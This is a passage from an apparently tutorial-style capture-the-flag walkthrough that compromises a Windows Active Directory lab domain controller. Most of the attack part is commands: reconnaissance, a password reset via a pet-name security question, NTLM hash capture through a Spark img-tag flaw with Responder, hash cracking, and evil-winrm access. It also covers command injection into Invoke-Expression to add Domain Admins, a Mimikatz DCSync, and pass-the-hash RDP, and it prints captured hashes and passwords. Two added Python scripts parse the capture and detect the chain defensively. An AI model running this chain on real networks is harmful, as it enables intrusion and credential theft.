Complex Attack Types: Sample Scenarios 31


Baris Dincer

This time, our target system is Windows and we will infiltrate the internal network and perform an attack on the Domain Controller.

In this article, you will see what you can do with Active Directory (AD) and how to reason through a complex attack chain. We will also add many methods to our attack scenario using various tools and principles.

You may see that the IPs change from time to time; do not worry, we will be using different machines as we progress. The methodology stays the same throughout.

Do you want to start, punks?

Let’s do that together.

First, let's save the values and directories we will use most as shell variables. Then, let's register the target machine in our local DNS using our /etc/hosts file.


Just ping it to check.


We are ready now.

We are in the discovery department. We need to better define the target machine and discover its network structure.

First, let’s do a subdomain search, there are many tools for this, but we preferred to use ffuf:

ffuf -w $wordlist_sub -u http://ourtargetsite.thm -H "Host: FUZZ.ourtargetsite.thm" -c -v


Or we can use gobuster: gobuster dns -d ourtargetsite.thm -w $wordlist_sub -i -c


This way you can conduct subdomain research. It’s time to take note of what we found and move on to the next step.

Now we can switch to the nmap tool. We will use this command to get to know the machine in front of us better: nmap -sV -sC -sS -T4 -A -oN nmap_result.txt -Pn --min-rate=300 --max-retries=3 -p- $target_ip

-sV: Service Version Detection: Probes open ports to determine what service and version are running.
-sC: Default Scripts: Enables the use of the default set of nmap scripts. These scripts perform a variety of tasks, such as version detection and basic vulnerability checks.
-sS: SYN Scan: Performs a TCP SYN scan, which is a more stealthy scan compared to a full TCP connect scan.
-T4: Timing Template: Sets the timing template to 4 (Aggressive), speeding up the scan by reducing wait times between probe transmissions.
-A: Aggressive Scan Options: Enables several advanced and aggressive scan options, including OS detection, version detection, script scanning, and traceroute.
-oN nmap_result.txt: Output to Normal File: Saves the scan results in normal output format to the specified file (nmap_result.txt).
-Pn: No Ping: Disables the ping scan. nmap will not try to ping the target hosts before scanning. Useful for scanning hosts that do not respond to ping requests (ICMP).
--min-rate=300: Minimum Packet Rate: Ensures that nmap sends packets at a rate of at least 300 packets per second to speed up the scan.
--max-retries=3: Maximum Retries: Limits the number of retransmissions of packets to 3 times, which can speed up the scan by reducing the wait for slow or unresponsive ports.
-p-: Scan All Ports: Scans all 65535 ports.

It may take a while for you to hear back, but be patient. You will get good information from here.


The output is quite long. You can check it yourself. We shared some points.

As you can see, we have open ports and version information. You’ve also seen advisory CVE notes.

53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5223/tcp open hpvirtgrp
5229/tcp open jaxflow
5262/tcp open unknown
5263/tcp open unknown
5269/tcp open xmpp-server
5270/tcp open xmp
5275/tcp open unknown
5276/tcp open unknown
5985/tcp open wsman
7070/tcp open realserver
7443/tcp open oracleas-https
7777/tcp open cbt
9090/tcp open zeus-admin
9091/tcp open xmltec-xmlmail
9389/tcp open adws
49671/tcp open unknown
49672/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49694/tcp open unknown
49894/tcp open unknown

There are many doors before us… In a real scenario, it is recommended that you conduct research on all of them and obtain all the information you can.

Let’s give information about some ports.

53/tcp open domain: DNS (Domain Name System) service, which translates domain names to IP addresses.
80/tcp open http: HTTP (Hypertext Transfer Protocol) service, used for web traffic.
88/tcp open kerberos-sec: Kerberos authentication system, which is used for network authentication.
135/tcp open msrpc: Microsoft RPC (Remote Procedure Call), used for remote administration.
139/tcp open netbios-ssn: NetBIOS Session Service, used for file and printer sharing.
389/tcp open ldap: LDAP (Lightweight Directory Access Protocol), used for directory services.
445/tcp open microsoft-ds: Microsoft-DS (Directory Services), used for SMB (Server Message Block) file sharing.
464/tcp open kpasswd5: Kerberos password change protocol.
593/tcp open http-rpc-epmap: HTTP RPC over epmap (EndPoint Mapper), used for DCOM services.
636/tcp open ldapssl: LDAP over SSL (Secure Sockets Layer), secure version of LDAP.
2179/tcp open vmrdp: Virtual Machine Remote Desktop Protocol, used for managing virtual machines.
3268/tcp open globalcatLDAP: Global Catalog LDAP, used in Active Directory for searches.
3269/tcp open globalcatLDAPssl: Global Catalog LDAP over SSL, secure version of Global Catalog LDAP.
3389/tcp open ms-wbt-server: Microsoft WBT (Windows Based Terminal) Server, used for Remote Desktop Protocol (RDP).
5223/tcp open hpvirtgrp: HP Virtual Group Management Service.
5229/tcp open jaxflow: JAXFlow, used for certain application management or monitoring.
5269/tcp open xmpp-server: XMPP (Extensible Messaging and Presence Protocol) server, used for server-to-server communication in XMPP networks (e.g., Jabber).
5270/tcp open xmp: XMP (eXtensible Messaging and Presence Protocol), likely used for some other messaging service.
5985/tcp open wsman: WS-Management (Web Services-Management) protocol, used for system management.
7070/tcp open realserver: RealNetworks RealServer, used for streaming media services.
7443/tcp open oracleas-https: Oracle Application Server HTTPS, secure web services provided by Oracle Application Server.
7777/tcp open cbt: CBT (Common Business Oriented Language), often used by Oracle Application Server or other web services.
9090/tcp open zeus-admin: Zeus Web Server admin interface, used for managing the Zeus web server.
9091/tcp open xmltec-xmlmail: XMLmail service, used for XML-based email communications.
9389/tcp open adws: Active Directory Web Services, used for web-based management of Active Directory.

With practice, you will better understand what these ports do over time.

There is a detail that caught our attention.

3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WINDCORP
| NetBIOS_Domain_Name: WINDCORP
| NetBIOS_Computer_Name: FIRE
| DNS_Domain_Name: windcorp.thm
| DNS_Computer_Name: Fire.windcorp.thm
| DNS_Tree_Name: windcorp.thm
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-27T10:03:02+00:00
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Issuer: commonName=Fire.windcorp.thm

The scan reveals that the target machine belongs to a domain named windcorp.thm. The NetBIOS domain name is WINDCORP and the DNS domain name is windcorp.thm. The target machine's NetBIOS computer name is FIRE and its DNS computer name is Fire.windcorp.thm.

Add it to your /etc/hosts file.


Go there.


Let’s do some research and see what we can find.


Here is a list of IT employees. Names like these are often reused as usernames in a similar form.

So save these.

organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
brownostrich284
sadswan869
whiteleopard529
happymeercat399
orangegorilla428

We also have potential usernames. You can increase this list.

Have you seen the phrase “openfire”? We also learned that they use Spark infrastructure. The Openfire Admin Console was accessible over port 9090. We saw this in our nmap output.


Spark is an Open Source, cross-platform IM client optimized for businesses and organizations. It features built-in support for group chat, telephony integration, and strong security. It also offers a great end-user experience with features like in-line spell checking, group chat room bookmarks, and tabbed conversations.

Note all findings.

Continue browsing the page.


Sometimes you want to make a gesture to your employees, but this can be a security breach for your company.

Here are photos of the employees. One of them also has a dog…


Pay attention to the file name!

There is a different name here besides the employee.

Dog’s name? We will see.

Do you remember fire.windcorp.thm? There was a password reset button here.

Now let’s try it with the information we have obtained.


Target the user whose dog's name appears in the filename: lilyle

Also change the security question to one that includes the pet name: Sparky

You may need to try a combination here. But it’s worth it.


We told you it would be worth it!

Now we have reset the password.

It’s time to try this username and password we have obtained on other applications.

SMB shares are also among the elements with which we can expand our attack surface.

SMB (Server Message Block) is a network file sharing protocol that allows applications and users to read and write to files and request services from server programs in a computer network. It is commonly used in Windows-based networks for file and printer sharing, as well as inter-process communication.

SMB allows files to be shared between computers on a network, enabling users to access and manage files on remote servers as if they were on the local machine.

Port 445/tcp (microsoft-ds): This is the primary port used by SMB for direct communication over TCP/IP without the need for the older NetBIOS layer.
Port 139/tcp (netbios-ssn): This port is used by SMB over NetBIOS over TCP/IP. It is used for older systems and for backward compatibility.

We need to use the smbclient tool and enumerate the target machine: smbclient -L //10.10.238.216


Root password… We don’t have it.

But we have Lilyle’s password.

Use it: smbclient -L //10.10.238.216 -U lilyle


Yep! The shares are laid out before us. Let's go into detail:

smbclient //10.10.238.216/Shared -U lilyle

or smbclient \\\\10.10.238.216\\Shared -U Windcorp.thm\\lilyle


As you can see, we have started to navigate the system.

Now let’s look at other potential usernames: smbclient \\\\10.10.238.216\\Users -U Windcorp.thm\\lilyle


We noticed that Spark version 2.8.3 was installed. This allows us to conduct an exploit investigation on this version.


Not quite what we wanted. Let's research it on the Internet.

Check that: https://nvd.nist.gov/vuln/detail/CVE-2020-12772

We also have a CVE number now: CVE-2020-12772

You will get such a resource in your research: https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md

When we opened a chat with another user, we could send an <img tag to that user with an external URL as the source of that image, like this:

<img src=[external_ip]/test.img>

Each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user you are chatting with!

By running responder, we could capture the hashes and use them to gain access to the user account and escalate our privileges (depending on the user of course).

We need to apply this theory.

After downloading the Spark 2.8.3 package, install it: sudo dpkg -i spark_2_8_3.deb

Follow the installation steps carefully. Then connect using the login information you have.

Username: lilyle
Password: ******
Domain: windcorp.thm

Download any image from the internet to your local machine as our_image.jpg. We will use <img src="http://10.6.33.73/our_image.jpg">

Pick one of the active users. We will choose “Buse”.


You must run the responder tool before sending the tag to the target.

Responder is a popular tool in the Kali Linux distribution used for network penetration testing and auditing. It is designed to capture various types of network traffic and responses, including hashes, authentication requests, and credentials, primarily by exploiting vulnerabilities in the way network protocols handle name resolution. Responder is also an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Remember, our goal is to obtain the NTLM hash and our target is Buse.

Use it to activate: sudo responder -I tun0 -dwv


Just send a message with our tag.


Wow! We have:

[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.226.131
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash : buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:010100000000
00003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C
004B00490054000400120073006D0062002E006C006F00630061006C0003002800730065007200760065007200320030003000
33002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000
00000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A0010000000
0000000000000000000000000000090000000000000000000000
[*] Skipping previously captured hash for WINDCORP\buse

Save the hash you obtained.
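For an analyst, a capture like this is evidence in its own right before any cracking: the client blob carries a FILETIME that dates the authentication attempt and a list of AV pairs naming the server the client believed it was talking to. The following Python script is an added example, not part of the original post: it splits the Responder line above (re-joined from its wrapped lines) into its fields and decodes the NTLMv2_CLIENT_CHALLENGE structure according to the public MS-NLMP layout; nothing in it depends on the password.

```python
import struct
from datetime import datetime, timedelta, timezone

# The Responder capture shown above, re-joined from its wrapped lines. The line is one
# value: user::domain:server_challenge:NTProofStr:NTLMv2_CLIENT_CHALLENGE (all hex).
CAPTURED_HASH = (
    "buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:010100000000"
    "00003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C"
    "004B00490054000400120073006D0062002E006C006F00630061006C0003002800730065007200760065007200320030003000"
    "33002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000"
    "00000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A0010000000"
    "0000000000000000000000000000090000000000000000000000"
)

# AV_PAIR ids from MS-NLMP section 2.2.2.1; the string-valued ones are UTF-16LE
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
STRING_AVS = {1, 2, 3, 4, 5, 9}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> timezone-aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def parse_ntlmv2_capture(line):
    """Split a Responder / hashcat mode 5600 line and decode its client challenge blob."""
    user, _, rest = line.partition("::")
    domain, server_challenge, nt_proof, blob_hex = rest.split(":")
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":                      # RespType / HiRespType must both be 1
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE structure")
    timestamp, = struct.unpack_from("<Q", blob, 8)   # bytes 8..16: FILETIME of the client
    client_challenge = blob[16:24].hex()             # bytes 16..24: ChallengeFromClient
    av_pairs, offset = {}, 28                        # AvPairs start after Reserved3
    while offset + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, offset)
        offset += 4
        if av_id == 0:                               # MsvAvEOL: end of list, ignore padding
            break
        value = blob[offset:offset + av_len]
        offset += av_len
        name = AV_NAMES.get(av_id, "AvId%d" % av_id)
        av_pairs[name] = value.decode("utf-16-le") if av_id in STRING_AVS else value.hex()
    return {"user": user, "domain": domain, "server_challenge": server_challenge,
            "nt_proof": nt_proof, "client_challenge": client_challenge,
            "timestamp": filetime_to_datetime(timestamp), "target_info": av_pairs}


if __name__ == "__main__":
    info = parse_ntlmv2_capture(CAPTURED_HASH)
    print(f"{info['domain']}\\{info['user']} answered at {info['timestamp']:%Y-%m-%d %H:%M:%S} UTC")
    for name, value in info["target_info"].items():
        print(f"  {name:16} {value}")
```

Decoded, this particular blob names SMB-TOOLKIT in smb.local rather than anything in windcorp.thm, so checking the target info this way is a cheap sanity test before trusting a capture as belonging to the environment under investigation.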


We will crack this using the john tool: john buse_hash --wordlist=/usr/share/wordlists/rockyou.txt

You will get this result:

└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
***
***
Press 'q' or Ctrl-C to abort, almost any other key for status
uzunLM+3131 (buse)
***
***

Now we have another password!

You can also use hashcat additionally for this cracking: hashcat -m 5600 buse_hash /usr/share/wordlists/rockyou.txt

Next is to use the evil-winrm tool.

Evil-WinRM is a PowerShell-based tool used for remote management of Windows systems. It leverages the Windows Remote Management (WinRM) protocol to execute commands and manage files on remote Windows machines. Evil-WinRM is particularly popular among penetration testers and red teamers for post-exploitation activities.

Use it: evil-winrm -i 10.10.238.216 -u buse -p uzunLM+3131


Or you can also do it by just providing the NTLM hash: evil-winrm -i 10.10.238.216 -u buse -H <NTLM-hash>


Let’s explore the system we have captured a little bit.


Let's move on to some more complex commands. Remember, this is a PowerShell environment.

Use (Get-ADUser $env:USERNAME -Properties *).MemberOf

Get-ADUser: This cmdlet is used to get a user object or perform a search to retrieve multiple user objects from Active Directory.
$env:USERNAME: This environment variable contains the username of the currently logged-in user. PowerShell retrieves the value of this variable to dynamically get the username.
-Properties *: The -Properties parameter specifies which properties of the AD user object should be retrieved. The asterisk (*) indicates that all properties should be retrieved.
.MemberOf: This part accesses the MemberOf property of the AD user object, which contains a list of distinguished names (DNs) of the groups the user is a member of.

Remember the IT people. Now let's query their group: (Get-ADGroup "IT" -Properties *).MemberOf


The command (Get-ADGroup "IT" -Properties *).MemberOf retrieves the groups that the "IT" group is a member of in an Active Directory (AD) environment.

CN=Account Operators,CN=Builtin,DC=windcorp,DC=thm:

The “IT” group is a member of the “Account Operators” group, which is a built-in group in the windcorp.thm domain.

CN=Remote Management Users,CN=Builtin,DC=windcorp,DC=thm:

The “IT” group is a member of the “Remote Management Users” group, which is a built-in group that typically has permissions for remote management tasks.

CN=Remote Desktop Users,CN=Builtin,DC=windcorp,DC=thm:

The “IT” group is a member of the “Remote Desktop Users” group, which is a built-in group that has permissions to log in to the system via Remote Desktop.

List all computers in AD: Get-ADComputer -Filter *


There are many commands for AD where you can get information. You can try these yourself.

Let’s continue.

Let's target a different user in the environment: brittanycr

You can check if the user account is enabled: Get-ADUser -Identity "brittanycr" -Properties "Enabled" | Select-Object -ExpandProperty Enabled


Reset its password: Set-ADAccountPassword -Identity brittanycr -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "ChangePassOur::!0" -Force)


You can check when the password was last set for a user: Get-ADUser -Identity "brittanycr" -Properties "PasswordLastSet" | Select-Object -ExpandProperty PasswordLastSet


Password change process was successful. Our new password is ChangePassOur::!0


But “brittanycr” user does not have WinRM privileges…

Explore a bit.


There is a powershell script called checkservers.ps1. Check this out. Maybe we’ll get some proof.


The PowerShell script checkservers.ps1 reads a file called hosts.txt located in C:\Users\brittanycr\ and passes the contents of that file to Invoke-Expression.

We can manipulate it.

Let's create a hosts.txt file locally and write the following in it: ; Add-ADGroupMember -Identity "Domain Admins" -Members "buse" ; Add-ADGroupMember -Identity "Administrators" -Members "buse"


Then upload it to brittanycr’s user folder via SMB: smbclient \\\\10.10.238.216\\Users -U Windcorp.thm\\brittanycr

Use this password we have created: ChangePassOur::!0


Now download this to your local: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1


Then copy to root directory.


Upload it to the target system from the evil-winrm shell: upload Invoke-Mimikatz.ps1


Activate it: . .\Invoke-Mimikatz.ps1

The magic begins when we type the following command:

Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /user:windcorp\Administrator"'

We have the admin’s hash value: bfa4cae19504e0591ef0a523a1936cd4

Let’s connect via WinRM: evil-winrm -i 10.10.238.216 -u Administrator -H bfa4cae19504e0591ef0a523a1936cd4


Now perform the following commands one by one:

New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -name 'DisableRestrictedAdmin' -PropertyType 'DWORD' -value '0' -force
New-ItemProperty: This cmdlet is used to create a new property (or registry entry) in a specified registry path.
-Path 'HKLM:\System\CurrentControlSet\Control\Lsa': Specifies the registry path where the new property will be created. In this case, it's under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa.
-name 'DisableRestrictedAdmin': Specifies the name of the new registry entry to be created (DisableRestrictedAdmin).
-PropertyType 'DWORD': Specifies the type of the property to be created. DWORD stands for a double-word value (32-bit integer).
-value '0': Specifies the value to assign to the DisableRestrictedAdmin registry entry. Here, it sets the value to 0.
-force: Forces the creation of the new registry entry, even if it already exists.

Now connect: xfreerdp /v:10.10.238.216 /u:Administrator /pth:bfa4cae19504e0591ef0a523a1936cd4 /dynamic-resolution
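Each escalation step above leaves a Windows Security event on the domain controller: the password reset by a non-admin account (4724), buse being added to Domain Admins and Administrators (4728/4732), the DCSync replication request issued by a user account (4662), and the DisableRestrictedAdmin value being written (4657). The following Python script is an added example, not from the original post: it runs four detection rules over a constructed set of events whose field names follow the real EventData schema but whose values are made up to mirror this chain; TIER0_ACCOUNTS is an assumption about which account may legitimately do these things, and the two GUIDs are the documented DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control-access rights.

```python
# Constructed sample of Windows Security events for the chain above. Field names follow
# the EventData of the real events (4724, 4728, 4732, 4662, 4657); values are made up.
EVENTS = [
    {"EventID": 4724, "SubjectUserName": "buse", "TargetUserName": "brittanycr"},
    {"EventID": 4728, "SubjectUserName": "brittanycr", "TargetUserName": "Domain Admins",
     "MemberName": "CN=buse,CN=Users,DC=windcorp,DC=thm"},
    {"EventID": 4732, "SubjectUserName": "brittanycr", "TargetUserName": "Administrators",
     "MemberName": "CN=buse,CN=Users,DC=windcorp,DC=thm"},
    {"EventID": 4662, "SubjectUserName": "buse", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "FIRE$", "ObjectType": "domainDNS",      # the DC itself
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},                      # replicating: benign
    {"EventID": 4657, "SubjectUserName": "Administrator", "ObjectValueName": "DisableRestrictedAdmin",
     "ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa", "NewValue": "0"},
    {"EventID": 4724, "SubjectUserName": "Administrator", "TargetUserName": "lilyle"},  # tier-0 reset
]

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Account Operators"}
TIER0_ACCOUNTS = {"Administrator"}     # assumption: the only account expected to do these things
REPLICATION_GUIDS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
                     "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")   # DS-Replication-Get-Changes-All


def detect(events):
    """Return (rule, actor, detail) tuples for events matching the chain's steps."""
    findings = []
    for e in events:
        eid, actor = e["EventID"], e.get("SubjectUserName", "")
        if eid == 4724 and actor not in TIER0_ACCOUNTS:
            # Account Operators may reset passwords; a reset by a non-tier-0 account gets reviewed
            findings.append(("password-reset-by-non-tier0", actor, e["TargetUserName"]))
        elif eid in (4728, 4732) and e["TargetUserName"] in PRIVILEGED_GROUPS:
            findings.append(("privileged-group-add", actor, f'{e["MemberName"]} -> {e["TargetUserName"]}'))
        elif (eid == 4662 and not actor.endswith("$") and actor not in TIER0_ACCOUNTS
              and any(g in e.get("Properties", "").lower() for g in REPLICATION_GUIDS)):
            # domain-controller computer accounts replicate legitimately; user accounts do not
            findings.append(("dcsync-replication-request", actor, e["Properties"]))
        elif (eid == 4657 and e.get("ObjectValueName") == "DisableRestrictedAdmin"
              and e.get("ObjectName", "").lower().endswith("\\control\\lsa")):
            # 4657 only fires when object-access auditing and a SACL on the Lsa key are in place
            findings.append(("restricted-admin-toggled", actor, f'DisableRestrictedAdmin={e["NewValue"]}'))
    return findings


if __name__ == "__main__":
    for rule, actor, detail in detect(EVENTS):
        print(f"[{rule}] by {actor}: {detail}")
```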


We are inside now!

Don’t give up on hacking.

Code for good.

^-^
